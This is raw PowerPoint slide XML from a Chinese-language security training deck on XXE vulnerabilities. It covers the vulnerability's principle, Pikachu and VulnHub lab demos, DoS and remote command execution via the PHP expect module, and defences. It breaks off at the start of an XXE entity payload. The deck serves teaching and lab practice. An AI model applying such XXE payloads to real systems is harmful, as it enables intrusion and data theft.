              </a:rPr>
              <a:t>1-100</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>端口中只有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>端口开放</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="15000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="605887" y="2831453"/>
            <a:ext cx="4953749" cy="2682014"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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671" y="2690492"/>
            <a:ext cx="6031130" cy="2990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351256" y="1335159"/>
            <a:ext cx="4601993"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利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>漏洞进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>dos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>攻击</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3" name="组合 12"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4262808" y="337827"/>
            <a:ext cx="3680220" cy="686293"/>
            <a:chOff x="4420971" y="414829"/>
            <a:chExt cx="3680220" cy="686293"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="文本框 13"/>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16" name="Group 55"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5898809" y="1028097"/>
              <a:ext cx="362272" cy="73025"/>
              <a:chOff x="7340600" y="4686300"/>
              <a:chExt cx="504030" cy="101600"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="5EE2B1"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1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2"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9"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pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2389356" y="1912548"/>
            <a:ext cx="6454607" cy="4706484"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1884740" y="3677134"/>
            <a:ext cx="8001058" cy="8715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924355" y="2075018"/>
            <a:ext cx="538324" cy="538324"/>
            <a:chOff x="1602768" y="2977178"/>
            <a:chExt cx="538324" cy="538324"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2" name="椭圆 1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1602768" y="2977178"/>
              <a:ext cx="538324" cy="538324"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="B99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998D"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="矩形 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1674437" y="2984730"/>
              <a:ext cx="385042" cy="521970"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" i="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="经典综艺体简" panose="02010609000101010101" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>1</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="32" name="组合 31"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5924355" y="2932888"/>
            <a:ext cx="4081780" cy="613347"/>
            <a:chOff x="6032903" y="2239683"/>
            <a:chExt cx="4081780" cy="613347"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="椭圆 2"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6032903" y="2314706"/>
              <a:ext cx="538324" cy="538324"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="B99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998D"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 10"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6796808" y="2239683"/>
              <a:ext cx="331787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rgbClr val="B9998D"/>
                  </a:solidFill>
                  <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="经典综艺体简" panose="02010609000101010101" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>pikachu靶场演示</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="矩形 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6109544" y="2281068"/>
              <a:ext cx="385042" cy="521970"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" i="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="经典综艺体简" panose="02010609000101010101" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>2</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="33" name="组合 32"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5924355" y="3824591"/>
            <a:ext cx="4956810" cy="588194"/>
            <a:chOff x="6151307" y="3229053"/>
            <a:chExt cx="4956810" cy="588194"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="椭圆 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6151307" y="3278923"/>
              <a:ext cx="538324" cy="538324"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="B99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998D"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="文本框 13"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6887907" y="3229053"/>
              <a:ext cx="4220210"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rgbClr val="B9998D"/>
                  </a:solidFill>
                  <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="经典综艺体简" panose="02010609000101010101" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>vulnhub虚拟机靶场实战</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="矩形 21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6215585" y="3290159"/>
              <a:ext cx="385042" cy="521970"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" i="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="经典综艺体简" panose="02010609000101010101" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>3</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="34" name="组合 33"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5924355" y="4716294"/>
            <a:ext cx="4081780" cy="620318"/>
            <a:chOff x="6001174" y="4272528"/>
            <a:chExt cx="4081780" cy="620318"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="椭圆 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6001174" y="4354522"/>
              <a:ext cx="538324" cy="538324"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="B99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998D"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="文本框 16"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6753014" y="4272528"/>
              <a:ext cx="332994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rgbClr val="B9998D"/>
                  </a:solidFill>
                  <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="经典综艺体简" panose="02010609000101010101" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>XXE</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="B9998D"/>
                  </a:solidFill>
                  <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="经典综艺体简" panose="02010609000101010101" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>漏洞防御方法</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="矩形 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6047671" y="4340625"/>
              <a:ext cx="385042" cy="521970"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" i="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="经典综艺体简" panose="02010609000101010101" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>4</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="30" name="组合 29"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1504449" y="2909395"/>
            <a:ext cx="3394953" cy="1927928"/>
            <a:chOff x="1287734" y="2663832"/>
            <a:chExt cx="3394953" cy="1927928"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="TextBox 18"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1287734" y="3483764"/>
              <a:ext cx="3394953" cy="706755"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="dist"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="B9998D"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>目录</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="28" name="图形 2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14332" y="2663832"/>
              <a:ext cx="881468" cy="881468"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="TextBox 18"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1770132" y="4191650"/>
              <a:ext cx="2430156" cy="400110"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="dist"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="B9998D"/>
                  </a:solidFill>
                  <a:ea typeface="张海山锐谐体" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
                </a:rPr>
                <a:t>CONTENTS</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B9998D"/>
                </a:solidFill>
                <a:ea typeface="张海山锐谐体" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="文本框 35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6754300" y="2090878"/>
            <a:ext cx="3317875"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rgbClr val="B9998D"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="经典综艺体简" panose="02010609000101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B9998D"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="经典综艺体简" panose="02010609000101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>漏洞原理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718449" y="1210257"/>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远程命令执行</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="组合 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4262808" y="337827"/>
            <a:ext cx="3680220" cy="686293"/>
            <a:chOff x="4420971" y="414829"/>
            <a:chExt cx="3680220" cy="686293"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="文本框 4"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4420971" y="414829"/>
              <a:ext cx="3680220"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Pikachu</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" spc="300" dirty="0">
                  <a:latin typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
                  <a:ea typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>靶场演示</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="7" name="Group 55"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5898809" y="1028097"/>
              <a:ext cx="362272" cy="73025"/>
              <a:chOff x="7340600" y="4686300"/>
              <a:chExt cx="504030" cy="101600"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="5EE2B1"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8"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1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14" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2140125" y="1943619"/>
            <a:ext cx="8797548" cy="878317"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>在配置不当</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>开发内部应用情况下（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>PHP expect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>模块被加载到了易受攻击的系统或处理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>的内部应用程序上），攻击者能够通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>执行代码。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="15000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2227330" y="3141270"/>
            <a:ext cx="6098380" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C6370"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;?xml version="1.0" encoding="UTF-8"?&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61AEEE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DOCTYPE any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61AEEE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61AEEE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="61AEEE"/>
                </a:solidFill>
                <a:effectLst/>
